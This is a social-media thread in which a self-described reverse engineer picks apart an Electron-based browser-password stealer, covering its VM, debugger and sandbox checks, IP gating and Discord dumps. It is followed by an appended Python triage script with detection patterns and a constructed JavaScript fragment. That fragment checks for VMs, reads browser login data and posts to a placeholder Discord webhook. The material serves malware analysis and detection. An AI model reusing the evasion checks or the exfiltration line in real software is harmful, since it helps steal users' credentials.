whenever you find the worst pits of the internet, you will find cloudflare there, quietly making money off it.
Notices by Foone🏳️⚧️ (foone@digipres.club), page 4
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:22 JST
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:21 JST
it also refuses to run if your external IP is one of a couple, which include a hungarian ISP, a couple IPs in moscow, and azure
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:20 JST
it is also apparently dumping these stolen passwords into a discord somewhere, and if it steals your wallet password it dumps it with "🤡 Leet Stealer"
even the bad guys think you're a clown for using cryptocurrency
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:10 JST
on a day with no ADHD meds, my roommate knocks on the door and is like "a friend got their discord hacked but before I knew it they sent me an EXE and I ran it. am I hacked?"
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:09 JST
seems it is an electron based javascript malware that tries to steal all your passwords from all your browsers
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:09 JST
I am some kind of reverse engineer/security engineer but I'm not very good at it WHEN MY BRAIN DOESN'T WORK
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:08 JST
huh, one of the things it does is check your RAM speed.
I think because that's a thing real computers have, and it's trying to do a roundabout VM check?
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:07 JST
it even checks against OllyDbg, a really great debugger that hasn't updated in 11 years
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:07 JST
but yeah it does a bunch of checks to see if anything remotely debuggy or VMy is running or even installed, then refuses to do stuff
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:06 JST
I'm looking at this disassembly from dez_ on twitter.
https://gist.github.com/joe-desimone/64b3c1044c184ffc8f26090d7bcd32b5
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:05 JST
yes let me accidentally try to unpack the electron app in poland, that's exactly the kind of protection I need: geographic protection
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:05 JST
there's a lot of very specific checks before it tries to do anything, I think this has been carefully designed to appear innocuous to the commonly used online sandboxes. like, it detects if it's running on virustotal and throws an error, instead of doing anything sneaky-deaky
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:04 JST
god I bet there are some malware out there that checks your location on GPS before running, and errors out if you're too close to Known Antivirus companies
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:03 JST
OH GOOD this is a different version that uses aes compression. so the source isn't just obfuscated, it's actually encrypted.
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:03 JST
sure there's work-from-home, but you're probably still within a reasonable driving distance of the office. they could just blacklist the entire metropolitan area
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:02 JST
I hope these fuckers aren't trying to obfuscate the password by abusing javascript scoping
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:01 JST
finally unencrypted and re-deobfuscated.
and it's got debugging strings in Turkish!
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:01 JST
my head already hurts enough as it is
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:57:00 JST
an awful lot of debugging information printed to console.log by this malware. it really tells you everything it is doing
Foone🏳️⚧️ (foone@digipres.club)'s status on Friday, 28-Mar-2025 06:56:59 JST
so it also checks your GPU.
You know, because VMs usually have a GPU like "VMware SVGA 3D"
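Pulling the checks this thread describes (OllyDbg, the "VMware SVGA 3D" GPU string, RAM probing, VirusTotal detection, the external-IP gate, the Discord drop) into a triage rule for a decoded JS bundle, as an added example that is not from the thread or from the sample it analyses. It assumes the bundle has already been decrypted and deobfuscated as the posts describe; the rule literals beyond the ones named in the posts, and the sample fragment, are constructed.

```python
import re

# Triage rules for a decoded Electron/JS bundle. Constructed for this example:
# OllyDbg, "VMware SVGA 3D", virustotal, the external-IP gate and the Discord
# drop are what the thread reports; the rest are well-known neighbours of those.
RULES = {
    "debugger_check": [r"\bollydbg\b", r"\bx64dbg\b", r"\bwindbg\b"],
    "vm_gpu_check":   [r"vmware svga", r"virtualbox graphics", r"win32_videocontroller"],
    "vm_ram_check":   [r"win32_physicalmemory"],
    "sandbox_check":  [r"virustotal", r"any\.run", r"hybrid-analysis"],
    "geo_ip_gate":    [r"ipinfo\.io", r"api\.ipify\.org", r"ip-api\.com"],
    "browser_creds":  [r"login data", r"local state", r"os_crypt"],
    "discord_exfil":  [r"discord(?:app)?\.com/api/webhooks"],
}

def scan_source(js_text: str) -> dict[str, list[str]]:
    """Return {category: sorted matched literals} for every rule that fires."""
    text = js_text.lower()
    hits = {}
    for category, patterns in RULES.items():
        found = sorted({m.group(0) for p in patterns for m in re.finditer(p, text)})
        if found:
            hits[category] = found
    return hits

def triage(js_text: str) -> tuple[str, dict[str, list[str]]]:
    """Turn rule hits into a verdict a responder can act on."""
    hits = scan_source(js_text)
    evasion = [c for c in hits if c.endswith(("_check", "_gate"))]
    theft = [c for c in hits if c in ("browser_creds", "discord_exfil")]
    if evasion and theft:
        verdict = "likely stealer with sandbox evasion: detonate in a hardened VM, reset credentials"
    elif theft:
        verdict = "credential access or exfil code present"
    elif evasion:
        verdict = "anti-analysis only: inspect further"
    else:
        verdict = "no rule hits"
    return verdict, hits

# Constructed fragment mimicking the checks the thread describes; not real malware.
SAMPLE_JS = r"""
const gpu = execSync('wmic path Win32_VideoController get Name').toString();
if (gpu.includes('VMware SVGA 3D')) process.exit(1);
if (execSync('tasklist').toString().toLowerCase().includes('ollydbg.exe')) throw new Error('nope');
const geo = await fetch('https://ipinfo.io/json').then(r => r.json());
const loginDb = path.join(profile, 'Login Data');
await fetch('https://discord.com/api/webhooks/0000/PLACEHOLDER', {method: 'POST', body});
"""
```

Running `triage(SAMPLE_JS)` reports the evasion categories alongside the credential and exfil hits, which is the combination worth escalating rather than any single string.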